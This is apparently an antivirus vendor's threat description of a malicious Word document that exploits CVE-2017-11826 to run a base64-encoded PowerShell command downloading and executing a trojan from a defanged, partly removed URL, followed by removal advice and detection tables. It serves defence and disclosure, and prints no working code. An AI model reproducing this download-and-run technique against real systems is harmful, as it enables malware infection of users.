MSWord/DDE.4433!tr
Analysis
MSWord/DDE.4433!tr is a generic detection for a trojan Exploit/Powershell Downloader.
Since this is a generic detection, malware that are detected as MSWord/DDE.4433!tr may have varying behaviour.
Below are examples of some of its characteristics/behaviours:
- Using an MSOffice exploit CVE-2017-11826 this malware intends to issue a powershell comamnd that will download from hxxp://bwo{Removed}.be/JHhdg33, afterwhich executes it.
- During the time of our tests the downloaded file, located at undefinedTempundefined\theyweare64.exe, is currently detected as W32/Kryptik.FYAD!tr.
- The malware uses base64 encoding to hide its actual powershell parameter.
- Below is an illustration of an infected document:
- Figure 1: Infected Document.
- Figure 2: The powershell script in the infected Document.
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
Extreme | |
FortiAPS | |
FortiAPU | |
FortiMail | |
Extreme | |
FortiSandbox | |
Extreme | |
FortiWeb | |
Extreme | |
Web Application Firewall | |
Extreme | |
FortiIsolator | |
Extreme | |
FortiDeceptor | |
Extreme | |
FortiEDR |
Version Updates
Date | Version | Detail |
---|---|---|
2023-02-27 | 91.00975 |